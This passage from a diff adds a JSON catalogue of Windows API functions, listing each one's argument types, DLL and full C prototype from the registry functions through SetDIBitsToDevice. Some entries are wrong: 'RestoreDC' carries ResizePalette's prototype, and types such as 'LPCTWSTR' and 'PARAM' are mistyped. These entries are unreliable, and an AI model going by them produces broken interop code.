"LPDWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegQueryValueExW ( HKEY hkey, LPCWSTR name, LPDWORD reserved, LPDWORD type, LPBYTE data, LPDWORD count );" + }, + { + "function_name": "RegReplaceKeyA", + "arguments": [ + "HKEY", + "LPCTSTR", + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegReplaceKeyA( HKEY hKey, LPCTSTR lpSubKey, LPCTSTR lpNewFile, LPCTSTR lpOldFile );" + }, + { + "function_name": "RegReplaceKeyW", + "arguments": [ + "HKEY", + "LPCWSTR", + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegReplaceKeyW( HKEY hkey, LPCWSTR lpSubKey, LPCWSTR lpNewFile, LPCWSTR lpOldFile );" + }, + { + "function_name": "RegRestoreKeyA", + "arguments": [ + "HKEY", + "LPCTSTR", + "DWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegRestoreKeyA( HKEY hKey, LPCTSTR lpszFile, DWORD fdw );" + }, + { + "function_name": "RegRestoreKeyW", + "arguments": [ + "HKEY", + "LPCWSTR", + "DWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegRestoreKeyW( HKEY hkey, LPCWSTR lpFile, DWORD dwFlags );" + }, + { + "function_name": "RegSaveKeyA", + "arguments": [ + "HKEY", + "LPCTSTR", + "LPSECURITY_ATTRIBUTES" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegSaveKeyA( HKEY hKey, LPCTSTR lpszFile, LPSECURITY_ATTRIBUTES lpsa );" + }, + { + "function_name": "RegSaveKeyW", + "arguments": [ + "HKEY", + "LPCWSTR", + "LPSECURITY_ATTRIBUTES" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegSaveKeyW ( HKEY hkey, LPCWSTR file, LPSECURITY_ATTRIBUTES sa );" + }, + { + "function_name": "RegSetKeySecurity", + "arguments": [ + "HKEY", + "SECURITY_INFORMATION", + "PSECURITY_DESCRIPTOR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegSetKeySecurity( HKEY hKey, SECURITY_INFORMATION si, PSECURITY_DESCRIPTOR psd );" + }, + { + "function_name": "RegSetValueA", + "arguments": [ + "HKEY", + "LPCTSTR", + "DWORD", + "LPCTSTR", + "DWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegSetValueA( HKEY hKey, LPCTSTR lpSubKey, DWORD dwType, LPCTSTR lpData, DWORD cbData );" + }, + { + "function_name": "RegSetValueW", + "arguments": [ + "HKEY", + "LPCWSTR", + "DWORD", + "LPCWSTR", + "DWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegSetValueW ( HKEY hkey, LPCWSTR name, DWORD type, LPCWSTR data, DWORD count );" + }, + { + "function_name": "RegSetValueExA", + "arguments": [ + "HKEY", + "LPCTSTR", + "DWORD", + "DWORD", + "CONST BYTE *", + "DWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegSetValueExA( HKEY hKey, LPCTSTR lpValueName, DWORD Reserved, DWORD dwType, CONST BYTE * lpData, DWORD cbData );" + }, + { + "function_name": "RegSetValueExW", + "arguments": [ + "HKEY", + "LPCWSTR", + "DWORD", + "DWORD", + "CONST BYTE*", + "DWORD" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegSetValueExW( HKEY hkey, LPCWSTR name, DWORD reserved, DWORD type, CONST BYTE* data, DWORD count );" + }, + { + "function_name": "RegUnLoadKeyA", + "arguments": [ + "HKEY", + "LPCTSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LONG RegUnLoadKeyA( HKEY hKey, LPCTSTR lpszSubKey );" + }, + { + "function_name": "RegUnLoadKeyW", + "arguments": [ + "HKEY", + "LPCWSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "LSTATUS RegUnLoadKeyW( HKEY hkey, LPCWSTR lpSubKey );" + }, + { + "function_name": "RegisterEventSourceA", + "arguments": [ + "LPCTSTR", + "LPCTSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "HANDLE RegisterEventSourceA( LPCTSTR lpszUNCServer, LPCTSTR lpszSource );" + }, + { + "function_name": "RegisterEventSourceW", + "arguments": [ + "LPCWSTR", + "LPCWSTR" + ], + "dll_name": "advapi32.dll", + "full_prototype": "HANDLE RegisterEventSourceW( LPCWSTR lpUNCServerName, LPCWSTR lpSourceName );" + }, + { + "function_name": "ReleaseCapture", + "arguments": [ + "" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ReleaseCapture(VOID);" + }, + { + "function_name": "ReleaseDC", + "arguments": [ + "HWND", + "HDC" + ], + "dll_name": "user32.dll", + "full_prototype": "int ReleaseDC(HWND hwnd, HDC hdc);" + }, + { + "function_name": "ReleaseMutex", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ReleaseMutex(HANDLE hMutex);" + }, + { + "function_name": "ReleaseSemaphore", + "arguments": [ + "HANDLE", + "LONG", + "LPLONG" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ReleaseSemaphore(HANDLE hSemaphore, LONG cReleaseCount,LPLONG lplPreviousCount);" + }, + { + "function_name": "RemoveDirectoryA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL RemoveDirectoryA(LPCTSTR lpszDir);" + }, + { + "function_name": "RemoveDirectoryW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL RemoveDirectoryW(LPCWSTR lpszDir);" + }, + { + "function_name": "RemoveDirectoryTransactedA", + "arguments": [ + "LPCTSTR", + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL RemoveDirectoryTransactedA(LPCTSTR lpPathName, HANDLE hTransaction);" + }, + { + "function_name": "RemoveDirectoryTransactedW", + "arguments": [ + "LPCTWSTR", + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL RemoveDirectoryTransactedW(LPCTWSTR lpPathName, HANDLE hTransaction);" + }, + { + "function_name": "RemoveFontResourceA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL RemoveFontResourceA(LPCTSTR lpFileName);" + }, + { + "function_name": "RemoveFontResourceW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL RemoveFontResourceW(LPCWSTR lpFileName);" + }, + { + "function_name": "RemoveMenu", + "arguments": [ + "HMENU", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL RemoveMenu(HMENU hmenu, UINT uItem,UINT fuFlags);" + }, + { + "function_name": "RemovePropA", + "arguments": [ + "HWND", + "LPCTSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HANDLE RemovePropA(HWND hwnd, LPCTSTR lpsz);" + }, + { + "function_name": "RemovePropW", + "arguments": [ + "HWND", + "LPCWSTR" + ], + "dll_name": "user32.dll", + "full_prototype": "HANDLE RemovePropW(HWND hwnd, LPCWSTR lpsz);" + }, + { + "function_name": "ReplyMessage", + "arguments": [ + "LRESULT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ReplyMessage(LRESULT lResult);" + }, + { + "function_name": "ReportEventA", + "arguments": [ + "HANDLE", + "WORD", + "WORD", + "DWORD", + "PSID", + "WORD", + "DWORD", + "LPCTSTR", + "LPVOID" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL ReportEventA( HANDLE hEventSource, WORD fwEventType, WORD fwCategory, DWORD IDEvent, PSID pUserSid, WORD cStrings, DWORD cbData, LPCTSTR *plpszStrings, LPVOID lpvData );" + }, + { + "function_name": "ReportEventW", + "arguments": [ + "HANDLE", + "WORD", + "WORD", + "DWORD", + "PSID", + "WORD", + "DWORD", + "LPCWSTR*", + "LPVOID" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL ReportEventW( HANDLE hEventLog, WORD wType, WORD wCategory, DWORD dwEventID, PSID lpUserSid, WORD wNumStrings, DWORD dwDataSize, LPCWSTR* lpStrings, LPVOID lpRawData );" + }, + { + "function_name": "ResetDCA", + "arguments": [ + "HDC", + "CONST DEVMODE *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HDC ResetDCA(HDC hdc, CONST DEVMODE * lpInitData);" + }, + { + "function_name": "ResetDCW", + "arguments": [ + "HDC", + "const DEVMODEW *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HDC ResetDCW(HDC hdc,const DEVMODEW * lpInitData);" + }, + { + "function_name": "ResetEvent", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ResetEvent(HANDLE hEvent);" + }, + { + "function_name": "ResizePalette", + "arguments": [ + "HPALETTE", + "UINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL ResizePalette(HPALETTE hpal, UINT nEntries);" + }, + { + "function_name": "RestoreDC", + "arguments": [ + "HPALETTE", + "UINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL ResizePalette(HPALETTE hpal, UINT nEntries);" + }, + { + "function_name": "RestoreMyDocsFolder", + "arguments": [], + "dll_name": "mydocs.dll", + "full_prototype": "long RestoreMyDocsFolder();" + }, + { + "function_name": "ResumeThread", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD ResumeThread(HANDLE hThread);" + }, + { + "function_name": "ReuseDDElParam", + "arguments": [ + "LONG", + "UINT", + "UINT", + "UINT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG ReuseDDElParam(LONG lParam, UINT uMsgIn, UINT uMsgOut, UINT uLow, UINT uHigh);" + }, + { + "function_name": "RevertToSelf", + "arguments": [ + "" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL RevertToSelf(VOID);" + }, + { + "function_name": "RtlFillMemory", + "arguments": [ + "VOID*", + "SIZE_T", + "BYTE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID RtlFillMemory(VOID* Destination, SIZE_T Length, BYTE Fill);" + }, + { + "function_name": "RtlMoveMemory", + "arguments": [ + "VOID*", + "CONST VOID*", + "SIZE_T" + ], + "dll_name": "kernel32.dll", + "full_prototype": "VOID RtlMoveMemory(VOID* Destination, CONST VOID* Source,SIZE_T Length);" + }, + { + "function_name": "RoundRect", + "arguments": [ + "HDC", + "int", + "int", + "int", + "int", + "int", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL RoundRect(HDC hdc, int nLeftRect, int nTopRect,int nRightRect, int nBottomRect, int nWidth, int nHeight);" + }, + { + "function_name": "SaveDC", + "arguments": [ + "HDC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int SaveDC(HDC hdc);" + }, + { + "function_name": "ScaleViewportExtEx", + "arguments": [ + "HDC", + "int", + "int", + "int", + "int", + "LPSIZE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL ScaleViewportExtEx(HDC hdc, int Xnum, int Xdenom, int Ynum, int Ydenom, LPSIZE lpSize);" + }, + { + "function_name": "ScaleWindowExtEx", + "arguments": [ + "HDC", + "int", + "int", + "int", + "int", + "LPSIZE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL ScaleWindowExtEx(HDC hdc,int Xnum, int Xdenom,int Ynum, int Ydenom,LPSIZE lpSize);" + }, + { + "function_name": "ScreenToClient", + "arguments": [ + "HWND", + "LPPOINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ScreenToClient(HWND hwnd, LPPOINT lpPoint);" + }, + { + "function_name": "ScrollConsoleScreenBufferA", + "arguments": [ + "HANDLE", + "PSMALL_RECT", + "PSMALL_RECT", + "COORD", + "PCHAR_INFO" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ScrollConsoleScreenBufferA(HANDLE hConsoleOutput, PSMALL_RECT psrctSourceRect, PSMALL_RECT psrctClipRect,COORD coordDestOrigin, PCHAR_INFO pchiFill);" + }, + { + "function_name": "ScrollConsoleScreenBufferW", + "arguments": [ + "HANDLE", + "PSMALL_RECT", + "PSMALL_RECT", + "COORD", + "PCHAR_INFO" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL ScrollConsoleScreenBufferW(HANDLE hConsoleOutput, PSMALL_RECT psrctSourceRect, PSMALL_RECT psrctClipRect,COORD coordDestOrigin, PCHAR_INFO pchiFill);" + }, + { + "function_name": "ScrollDC", + "arguments": [ + "HDC", + "int", + "int", + "CONST RECT", + "CONST RECT", + "HRGN", + "LPRECT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ScrollDC(HDC hdc, int dx, int dy, CONST RECT *lprcScroll, CONST RECT *lprcClip, HRGN hrgnUpdate, LPRECT lprcUpdate);" + }, + { + "function_name": "ScrollWindow", + "arguments": [ + "HWND", + "int", + "int", + "CONST RECT *", + "CONST RECT *" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL ScrollWindow(HWND hwnd, int dx, int dy, CONST RECT * lprcScroll, CONST RECT * lprcClip);" + }, + { + "function_name": "ScrollWindowEx", + "arguments": [ + "HWND", + "int", + "int", + "CONST RECT", + "CONST RECT", + "HRGN", + "LPRECT", + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "int ScrollWindowEx(HWND hwnd,int dx,int dy,CONST RECT *lprcScroll,CONST RECT *lprcClip, HRGN hrgnUpdate, LPRECT lprcUpdate, UINT fuScroll);" + }, + { + "function_name": "SearchPathA", + "arguments": [ + "LPCTSTR", + "LPCTSTR", + "LPCTSTR", + "DWORD", + "LPTSTR", + "LPTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD SearchPathA(LPCTSTR lpszPath, LPCTSTR lpszFile, LPCTSTR lpszExtension, DWORD cchReturnBuffer, LPTSTR lpszReturnBuffer, LPTSTR *plpszFilePart);" + }, + { + "function_name": "SearchPathW", + "arguments": [ + "LPCWSTR", + "LPCWSTR", + "LPCWSTR", + "DWORD", + "LPWSTR", + "LPWSTR*" + ], + "dll_name": "kernel32.dll", + "full_prototype": "DWORD SearchPathW(LPCWSTR path, LPCWSTR name, LPCWSTR ext, DWORD buflen, LPWSTR buffer, LPWSTR* lastpart);" + }, + { + "function_name": "SearchTreeForFile", + "arguments": [ + "PCTSTR", + "PCTSTR", + "PTSTR" + ], + "dll_name": "imagehlp.dll", + "full_prototype": "BOOL SearchTreeForFile(PCTSTR RootPath, PCTSTR InputPathName,PTSTR OutputPathBuffer);" + }, + { + "function_name": "SelectClipPath", + "arguments": [ + "HDC", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL SelectClipPath(HDC hdc, int iMode);" + }, + { + "function_name": "SelectClipRgn", + "arguments": [ + "HDC", + "HRGN" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int SelectClipRgn(HDC hdc, HRGN hrgn);" + }, + { + "function_name": "SelectObject", + "arguments": [ + "HDC", + "HGDIOBJ" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HGDIOBJ SelectObject(HDC hdc, HGDIOBJ hgdiobj);" + }, + { + "function_name": "SelectPalette", + "arguments": [ + "HDC", + "HPALETTE", + "BOOL" + ], + "dll_name": "gdi32.dll", + "full_prototype": "HPALETTE SelectPalette(HDC hdc, HPALETTE hpal, BOOL bForceBackground);" + }, + { + "function_name": "SendDlgItemMessageA", + "arguments": [ + "HWND", + "int", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG SendDlgItemMessageA(HWND hwndDlg, int idControl, UINT uMsg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "SendDlgItemMessageW", + "arguments": [ + "HWND", + "int", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "LONG SendDlgItemMessageW(HWND hwndDlg, int idControl, UINT uMsg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "SendMessageA", + "arguments": [ + "HWND", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "LRESULT SendMessageA(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "SendMessageCallbackA", + "arguments": [ + "HWND", + "UINT", + "WPARAM", + "PARAM", + "SENDASYNCPROC", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SendMessageCallbackA(HWND hwnd, UINT uMsg, WPARAM wParam, PARAM lParam, SENDASYNCPROC lpResultCallBack, DWORD dwData);" + }, + { + "function_name": "SendMessageCallbackW", + "arguments": [ + "HWND", + "UINT", + "WPARAM", + "PARAM", + "SENDASYNCPROC", + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SendMessageCallbackW(HWND hwnd, UINT uMsg, WPARAM wParam, PARAM lParam, SENDASYNCPROC lpResultCallBack, DWORD dwData);" + }, + { + "function_name": "SendMessageTimeoutA", + "arguments": [ + "HWND", + "UINT", + "WPARAM", + "LPARAM", + "UINT", + "UINT", + "LPDWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "LRESULT SendMessageTimeoutA(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam, UINT fuFlags, UINT uTimeout, LPDWORD lpdwResult);" + }, + { + "function_name": "SendMessageTimeoutW", + "arguments": [ + "HWND", + "UINT", + "WPARAM", + "LPARAM", + "UINT", + "UINT", + "LPDWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "LRESULT SendMessageTimeoutW(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam, UINT fuFlags, UINT uTimeout, LPDWORD lpdwResult);" + }, + { + "function_name": "SendMessageW", + "arguments": [ + "HWND", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "LRESULT SendMessageW(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "SendNotifyMessageA", + "arguments": [ + "HWND", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SendNotifyMessageA(HWND hwnd,UINT uMsg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "SendNotifyMessageW", + "arguments": [ + "HWND", + "UINT", + "WPARAM", + "LPARAM" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SendNotifyMessageW(HWND hwnd,UINT uMsg, WPARAM wParam, LPARAM lParam);" + }, + { + "function_name": "SetAbortProc", + "arguments": [ + "HDC", + "ABORTPROC" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int SetAbortProc(HDC hdc, ABORTPROC lpAbortProc);" + }, + { + "function_name": "SetAclInformation", + "arguments": [ + "PACL", + "LPVOID", + "DWORD", + "ACL_INFORMATION_CLASS" + ], + "dll_name": "advapi32.dll", + "full_prototype": "BOOL SetAclInformation( PACL pAcl, LPVOID lpvAclInfo, DWORD cbAclInfo, ACL_INFORMATION_CLASS aclic );" + }, + { + "function_name": "SetActiveWindow", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND SetActiveWindow(HWND hwnd);" + }, + { + "function_name": "SetArcDirection", + "arguments": [ + "HDC", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int SetArcDirection(HDC hdc, int ArcDirection);" + }, + { + "function_name": "SetBitmapBits", + "arguments": [ + "HBITMAP", + "DWORD", + "CONST VOID" + ], + "dll_name": "gdi32.dll", + "full_prototype": "LONG SetBitmapBits(HBITMAP hbmp, DWORD cBytes, CONST VOID *lpBits);" + }, + { + "function_name": "SetBitmapDimensionEx", + "arguments": [ + "HBITMAP", + "int", + "int", + "LPSIZE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL SetBitmapDimensionEx(HBITMAP hBitmap,int nWidth, int nHeight, LPSIZE lpSize);" + }, + { + "function_name": "SetBkColor", + "arguments": [ + "HDC", + "COLORREF" + ], + "dll_name": "gdi32.dll", + "full_prototype": "COLORREF SetBkColor(HDC hdc, COLORREF crColor);" + }, + { + "function_name": "SetBkMode", + "arguments": [ + "HDC", + "int" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int SetBkMode(HDC hdc, int iBkMode);" + }, + { + "function_name": "SetBoundsRect", + "arguments": [ + "HDC", + "CONST RECT", + "UINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT SetBoundsRect(HDC hdc, CONST RECT *lprcBounds, UINT flags);" + }, + { + "function_name": "SetBrushOrgEx", + "arguments": [ + "HDC", + "int", + "int", + "LPPOINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL SetBrushOrgEx(HDC hdc, int nXOrg, int nYOrg, LPPOINT lppt);" + }, + { + "function_name": "SetCapture", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND SetCapture(HWND hwnd);" + }, + { + "function_name": "SetCaretBlinkTime", + "arguments": [ + "UINT" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetCaretBlinkTime(UINT wMSeconds);" + }, + { + "function_name": "SetCaretPos", + "arguments": [ + "int", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetCaretPos(int nX, int nY);" + }, + { + "function_name": "SetClassLongA", + "arguments": [ + "HWND", + "int", + "LONG" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD SetClassLongA(HWND hwnd,int nIndex, LONG lNewVal);" + }, + { + "function_name": "SetClassLongW", + "arguments": [ + "HWND", + "int", + "LONG" + ], + "dll_name": "user32.dll", + "full_prototype": "DWORD SetClassLongW(HWND hwnd,int nIndex, LONG lNewVal);" + }, + { + "function_name": "SetClassWord", + "arguments": [ + "HWND", + "int", + "WORD" + ], + "dll_name": "user32.dll", + "full_prototype": "WORD SetClassWord(HWND hwnd, int nIndex, WORD wNewWord);" + }, + { + "function_name": "SetClipboardData", + "arguments": [ + "UINT", + "HANDLE" + ], + "dll_name": "user32.dll", + "full_prototype": "HANDLE SetClipboardData(UINT uFormat, HANDLE hData);" + }, + { + "function_name": "SetClipboardViewer", + "arguments": [ + "HWND" + ], + "dll_name": "user32.dll", + "full_prototype": "HWND SetClipboardViewer(HWND hwnd);" + }, + { + "function_name": "SetColorAdjustment", + "arguments": [ + "HDC", + "CONST COLORADJUSTMENT *" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL SetColorAdjustment(HDC hdc, CONST COLORADJUSTMENT * lpca);" + }, + { + "function_name": "SetColorSpace", + "arguments": [ + "HDC", + "HCOLORSPACE" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL SetColorSpace(HDC hdc, HCOLORSPACE hColorSpace);" + }, + { + "function_name": "SetCommBreak", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetCommBreak(HANDLE hCommDev);" + }, + { + "function_name": "SetCommConfig", + "arguments": [ + "HANDLE", + "LPBYTE", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetCommConfig(HANDLE hCommDev, LPBYTE lpCC, DWORD dwSize);" + }, + { + "function_name": "SetCommMask", + "arguments": [ + "HANDLE", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetCommMask(HANDLE hCommDev,DWORD fdwEvtMask);" + }, + { + "function_name": "SetCommState", + "arguments": [ + "HANDLE", + "LPDCB" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetCommState(HANDLE hCommDev, LPDCB lpdcb);" + }, + { + "function_name": "SetCommTimeouts", + "arguments": [ + "HANDLE", + "LPCOMMTIMEOUTS" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetCommTimeouts(HANDLE hCommDev, LPCOMMTIMEOUTS lpctmo);" + }, + { + "function_name": "SetComputerNameA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetComputerNameA(LPCTSTR lpszName);" + }, + { + "function_name": "SetComputerNameW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetComputerNameW(LPCWSTR lpComputerName);" + }, + { + "function_name": "SetConsoleActiveScreenBuffer", + "arguments": [ + "HANDLE" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetConsoleActiveScreenBuffer(HANDLE hConsoleOutput);" + }, + { + "function_name": "SetConsoleCP", + "arguments": [ + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetConsoleCP(UINT IDCodePage);" + }, + { + "function_name": "SetConsoleCtrlHandler", + "arguments": [ + "PHANDLER_ROUTINE", + "BOOL" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetConsoleCtrlHandler(PHANDLER_ROUTINE pHandlerRoutine, BOOL fAdd);" + }, + { + "function_name": "SetConsoleCursorInfo", + "arguments": [ + "HANDLE", + "PCONSOLE_CURSOR_INFO" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetConsoleCursorInfo(HANDLE hConsoleOutput, PCONSOLE_CURSOR_INFO pcci);" + }, + { + "function_name": "SetConsoleCursorPosition", + "arguments": [ + "HANDLE", + "COORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetConsoleCursorPosition( HANDLE hConsoleOutput, COORD coordCursor );" + }, + { + "function_name": "SetConsoleMode", + "arguments": [ + "HANDLE", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetConsoleMode(HANDLE hConsole, DWORD fdwMode);" + }, + { + "function_name": "SetConsoleOutputCP", + "arguments": [ + "UINT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetConsoleOutputCP(UINT IDCodePage);" + }, + { + "function_name": "SetConsoleScreenBufferSize", + "arguments": [ + "HANDLE", + "COORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetConsoleScreenBufferSize(HANDLE hConsoleOutput, COORD coordSize);" + }, + { + "function_name": "SetConsoleTextAttribute", + "arguments": [ + "HANDLE", + "WORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetConsoleTextAttribute(HANDLE hConsoleOutput, WORD wAttr);" + }, + { + "function_name": "SetConsoleTitleA", + "arguments": [ + "LPTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetConsoleTitleA(LPTSTR lpszTitle);" + }, + { + "function_name": "SetConsoleTitleW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetConsoleTitleW(LPCWSTR title);" + }, + { + "function_name": "SetConsoleWindowInfo", + "arguments": [ + "HANDLE", + "BOOL", + "PSMALL_RECT" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetConsoleWindowInfo(HANDLE hConsoleOutput, BOOL fAbsolute, PSMALL_RECT psrctWindowRect);" + }, + { + "function_name": "SetCurrentDirectoryA", + "arguments": [ + "LPCTSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetCurrentDirectoryA(LPCTSTR lpPathName);" + }, + { + "function_name": "SetCurrentDirectoryW", + "arguments": [ + "LPCWSTR" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetCurrentDirectoryW(LPCWSTR lpPathName);" + }, + { + "function_name": "SetCursor", + "arguments": [ + "HCURSOR" + ], + "dll_name": "user32.dll", + "full_prototype": "HCURSOR SetCursor(HCURSOR hcur);" + }, + { + "function_name": "SetCursorPos", + "arguments": [ + "int", + "int" + ], + "dll_name": "user32.dll", + "full_prototype": "BOOL SetCursorPos(int X, int Y);" + }, + { + "function_name": "SetDebugErrorLevel", + "arguments": [ + "DWORD" + ], + "dll_name": "user32.dll", + "full_prototype": "VOID SetDebugErrorLevel(DWORD dwLevel);" + }, + { + "function_name": "SetDefaultCommConfigA", + "arguments": [ + "LPCSTR", + "LPCOMMCONFIG", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetDefaultCommConfigA(LPCSTR lpszName, LPCOMMCONFIG lpCC, DWORD dwSize);" + }, + { + "function_name": "SetDefaultCommConfigW", + "arguments": [ + "LPCWSTR", + "LPCOMMCONFIG", + "DWORD" + ], + "dll_name": "kernel32.dll", + "full_prototype": "BOOL SetDefaultCommConfigW(LPCWSTR lpszDevice, LPCOMMCONFIG lpCommConfig, DWORD dwSize);" + }, + { + "function_name": "SetDeviceGammaRamp", + "arguments": [ + "HDC", + "LPVOID" + ], + "dll_name": "gdi32.dll", + "full_prototype": "BOOL SetDeviceGammaRamp(HDC hdc, LPVOID lpRamp);" + }, + { + "function_name": "SetDIBColorTable", + "arguments": [ + "HDC", + "UINT", + "UINT", + "RGBQUAD" + ], + "dll_name": "gdi32.dll", + "full_prototype": "UINT SetDIBColorTable(HDC hdc,UINT uStartIndex, UINT cEntries, RGBQUAD *pColors);" + }, + { + "function_name": "SetDIBits", + "arguments": [ + "HDC", + "HBITMAP", + "UINT", + "UINT", + "CONST VOID *", + "CONST BITMAPINFO *", + "UINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int SetDIBits(HDC hdc,HBITMAP hbmp, UINT uStartScan, UINT cScanLines, CONST VOID * lpvBits, CONST BITMAPINFO * lpbmi, UINT fuColorUse);" + }, + { + "function_name": "SetDIBitsToDevice", + "arguments": [ + "HDC", + "int", + "int", + "DWORD", + "DWORD", + "int", + "int", + "UINT", + "UINT", + "CONST VOID *", + "CONST BITMAPINFO *", + "UINT" + ], + "dll_name": "gdi32.dll", + "full_prototype": "int SetDIBitsToDevice(HDC hdc, int XDest,int YDest, DWORD dwWidth, DWORD dwHeight, int XSrc, int YSrc, UINT uStartScan, UINT cScanLines, CONST 